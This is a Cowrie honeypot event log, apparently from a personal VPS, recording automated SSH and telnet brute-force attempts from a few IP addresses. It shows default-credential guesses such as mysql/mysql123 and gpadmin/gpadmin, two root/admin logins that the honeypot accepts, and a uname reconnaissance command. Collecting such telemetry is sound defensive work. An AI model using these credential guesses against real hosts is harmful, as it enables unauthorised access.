{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:30:54.958924Z","src_ip":"212.227.235.229","session":"4359018ceaab"}
{"eventid":"cowrie.login.failed","username":"lighthouse","password":"lighthouse123","message":"login attempt [lighthouse/lighthouse123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:30:55.709105Z","src_ip":"212.227.235.229","session":"4359018ceaab"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:30:56.961372Z","src_ip":"212.227.235.229","session":"4359018ceaab"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":38216,"dst_ip":"1.2.3.4","dst_port":23,"session":"cd44bae0a5fb","protocol":"telnet","message":"New connection: 8.222.212.69:38216 (1.2.3.4:23) [session: cd44bae0a5fb]","sensor":"my-vps","timestamp":"2025-08-28T06:31:01.968348Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59072,"dst_ip":"1.2.3.4","dst_port":22,"session":"03f73b20d357","protocol":"ssh","message":"New connection: 212.227.125.160:59072 (1.2.3.4:22) [session: 03f73b20d357]","sensor":"my-vps","timestamp":"2025-08-28T06:31:04.346561Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:31:04.348725Z","src_ip":"212.227.125.160","session":"03f73b20d357"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:31:04.565646Z","src_ip":"212.227.125.160","session":"03f73b20d357"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"mysql123","message":"login attempt [mysql/mysql123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:31:05.438920Z","src_ip":"212.227.125.160","session":"03f73b20d357"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41594,"dst_ip":"1.2.3.4","dst_port":23,"session":"2a452aec24b3","protocol":"telnet","message":"New connection: 212.227.235.229:41594 (1.2.3.4:23) [session: 2a452aec24b3]","sensor":"my-vps","timestamp":"2025-08-28T06:31:05.524665Z"}
{"eventid":"cowrie.session.closed","duration":0.19521713256835938,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:31:05.719785Z","src_ip":"212.227.235.229","session":"2a452aec24b3"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:31:06.658776Z","src_ip":"212.227.125.160","session":"03f73b20d357"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51256,"dst_ip":"1.2.3.4","dst_port":23,"session":"648b3a30a018","protocol":"telnet","message":"New connection: 212.227.235.229:51256 (1.2.3.4:23) [session: 648b3a30a018]","sensor":"my-vps","timestamp":"2025-08-28T06:31:09.407929Z"}
{"eventid":"cowrie.login.failed","username":"GET / HTTP/1.1","password":"Host: 212.227.235.229:23","message":"login attempt [GET / HTTP/1.1/Host: 212.227.235.229:23] failed","sensor":"my-vps","timestamp":"2025-08-28T06:31:09.409225Z","src_ip":"212.227.235.229","session":"648b3a30a018"}
{"eventid":"cowrie.login.failed","username":"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36","password":"Accept: */*","message":"login attempt [User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36/Accept: */*] failed","sensor":"my-vps","timestamp":"2025-08-28T06:31:09.410007Z","src_ip":"212.227.235.229","session":"648b3a30a018"}
{"eventid":"cowrie.login.failed","username":"Accept-Encoding: gzip","password":"","message":"login attempt [Accept-Encoding: gzip/] failed","sensor":"my-vps","timestamp":"2025-08-28T06:31:09.410934Z","src_ip":"212.227.235.229","session":"648b3a30a018"}
{"eventid":"cowrie.session.closed","duration":0.1725757122039795,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:31:09.580429Z","src_ip":"212.227.235.229","session":"648b3a30a018"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54140,"dst_ip":"1.2.3.4","dst_port":22,"session":"f6c6f926b5dc","protocol":"ssh","message":"New connection: 212.227.235.229:54140 (1.2.3.4:22) [session: f6c6f926b5dc]","sensor":"my-vps","timestamp":"2025-08-28T06:31:11.019635Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:31:11.022933Z","src_ip":"212.227.235.229","session":"f6c6f926b5dc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:31:11.266612Z","src_ip":"212.227.235.229","session":"f6c6f926b5dc"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"mysql123","message":"login attempt [mysql/mysql123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:31:12.253351Z","src_ip":"212.227.235.229","session":"f6c6f926b5dc"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:31:13.502736Z","src_ip":"212.227.235.229","session":"f6c6f926b5dc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54222,"dst_ip":"1.2.3.4","dst_port":23,"session":"18deb1a07560","protocol":"telnet","message":"New connection: 212.227.125.160:54222 (1.2.3.4:23) [session: 18deb1a07560]","sensor":"my-vps","timestamp":"2025-08-28T06:31:14.788906Z"}
{"eventid":"cowrie.session.closed","duration":0.12441730499267578,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:31:14.913227Z","src_ip":"212.227.125.160","session":"18deb1a07560"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54230,"dst_ip":"1.2.3.4","dst_port":23,"session":"0155f58cda39","protocol":"telnet","message":"New connection: 212.227.125.160:54230 (1.2.3.4:23) [session: 0155f58cda39]","sensor":"my-vps","timestamp":"2025-08-28T06:31:18.342607Z"}
{"eventid":"cowrie.login.failed","username":"GET / HTTP/1.1","password":"Host: 212.227.125.160:23","message":"login attempt [GET / HTTP/1.1/Host: 212.227.125.160:23] failed","sensor":"my-vps","timestamp":"2025-08-28T06:31:18.343827Z","src_ip":"212.227.125.160","session":"0155f58cda39"}
{"eventid":"cowrie.login.failed","username":"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36","password":"Accept: */*","message":"login attempt [User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36/Accept: */*] failed","sensor":"my-vps","timestamp":"2025-08-28T06:31:18.344634Z","src_ip":"212.227.125.160","session":"0155f58cda39"}
{"eventid":"cowrie.login.failed","username":"Accept-Encoding: gzip","password":"","message":"login attempt [Accept-Encoding: gzip/] failed","sensor":"my-vps","timestamp":"2025-08-28T06:31:18.345787Z","src_ip":"212.227.125.160","session":"0155f58cda39"}
{"eventid":"cowrie.session.closed","duration":0.12576627731323242,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:31:18.468301Z","src_ip":"212.227.125.160","session":"0155f58cda39"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36438,"dst_ip":"1.2.3.4","dst_port":22,"session":"4ce94b1bcc5a","protocol":"ssh","message":"New connection: 212.227.125.160:36438 (1.2.3.4:22) [session: 4ce94b1bcc5a]","sensor":"my-vps","timestamp":"2025-08-28T06:31:20.933761Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:31:20.934894Z","src_ip":"212.227.125.160","session":"4ce94b1bcc5a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:31:21.153266Z","src_ip":"212.227.125.160","session":"4ce94b1bcc5a"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:31:21.810147Z","src_ip":"212.227.125.160","session":"4ce94b1bcc5a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:31:22.332190Z","src_ip":"212.227.125.160","session":"4ce94b1bcc5a"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:31:22.332996Z","src_ip":"212.227.125.160","session":"4ce94b1bcc5a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:31:22.556074Z","src_ip":"212.227.125.160","session":"4ce94b1bcc5a"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:31:22.557258Z","src_ip":"212.227.125.160","session":"4ce94b1bcc5a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48736,"dst_ip":"1.2.3.4","dst_port":22,"session":"9ae4330072f1","protocol":"ssh","message":"New connection: 212.227.235.229:48736 (1.2.3.4:22) [session: 9ae4330072f1]","sensor":"my-vps","timestamp":"2025-08-28T06:31:27.524824Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:31:27.525853Z","src_ip":"212.227.235.229","session":"9ae4330072f1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:31:27.780656Z","src_ip":"212.227.235.229","session":"9ae4330072f1"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:31:28.546506Z","src_ip":"212.227.235.229","session":"9ae4330072f1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:31:29.108243Z","src_ip":"212.227.235.229","session":"9ae4330072f1"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:31:29.108922Z","src_ip":"212.227.235.229","session":"9ae4330072f1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:31:29.365038Z","src_ip":"212.227.235.229","session":"9ae4330072f1"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:31:29.365912Z","src_ip":"212.227.235.229","session":"9ae4330072f1"}
{"eventid":"cowrie.session.closed","duration":32.50272536277771,"message":"Connection lost after 32 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:31:34.470949Z","src_ip":"8.222.212.69","session":"cd44bae0a5fb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53808,"dst_ip":"1.2.3.4","dst_port":22,"session":"1384650b5595","protocol":"ssh","message":"New connection: 212.227.125.160:53808 (1.2.3.4:22) [session: 1384650b5595]","sensor":"my-vps","timestamp":"2025-08-28T06:31:37.405777Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:31:37.406938Z","src_ip":"212.227.125.160","session":"1384650b5595"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:31:37.626339Z","src_ip":"212.227.125.160","session":"1384650b5595"}
{"eventid":"cowrie.login.failed","username":"gpadmin","password":"gpadmin","message":"login attempt [gpadmin/gpadmin] failed","sensor":"my-vps","timestamp":"2025-08-28T06:31:38.282262Z","src_ip":"212.227.125.160","session":"1384650b5595"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:31:39.501680Z","src_ip":"212.227.125.160","session":"1384650b5595"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53226,"dst_ip":"1.2.3.4","dst_port":22,"session":"5b61c59e0b12","protocol":"ssh","message":"New connection: 212.227.235.229:53226 (1.2.3.4:22) [session: 5b61c59e0b12]","sensor":"my-vps","timestamp":"2025-08-28T06:31:43.992990Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:31:43.993983Z","src_ip":"212.227.235.229","session":"5b61c59e0b12"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:31:44.245427Z","src_ip":"212.227.235.229","session":"5b61c59e0b12"}
{"eventid":"cowrie.login.failed","username":"gpadmin","password":"gpadmin","message":"login attempt [gpadmin/gpadmin] failed","sensor":"my-vps","timestamp":"2025-08-28T06:31:45.001883Z","src_ip":"212.227.235.229","session":"5b61c59e0b12"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:31:46.255932Z","src_ip":"212.227.235.229","session":"5b61c59e0b12"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":39606,"dst_ip":"1.2.3.4","dst_port":23,"session":"02b9c7de2a60","protocol":"telnet","message":"New connection: 8.222.212.69:39606 (1.2.3.4:23) [session: 02b9c7de2a60]","sensor":"my-vps","timestamp":"2025-08-28T06:31:46.815117Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55132,"dst_ip":"1.2.3.4","dst_port":22,"session":"e45c947734db","protocol":"ssh","message":"New connection: 212.227.125.160:55132 (1.2.3.4:22) [session: e45c947734db]","sensor":"my-vps","timestamp":"2025-08-28T06:31:53.816214Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:31:53.822502Z","src_ip":"212.227.125.160","session":"e45c947734db"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 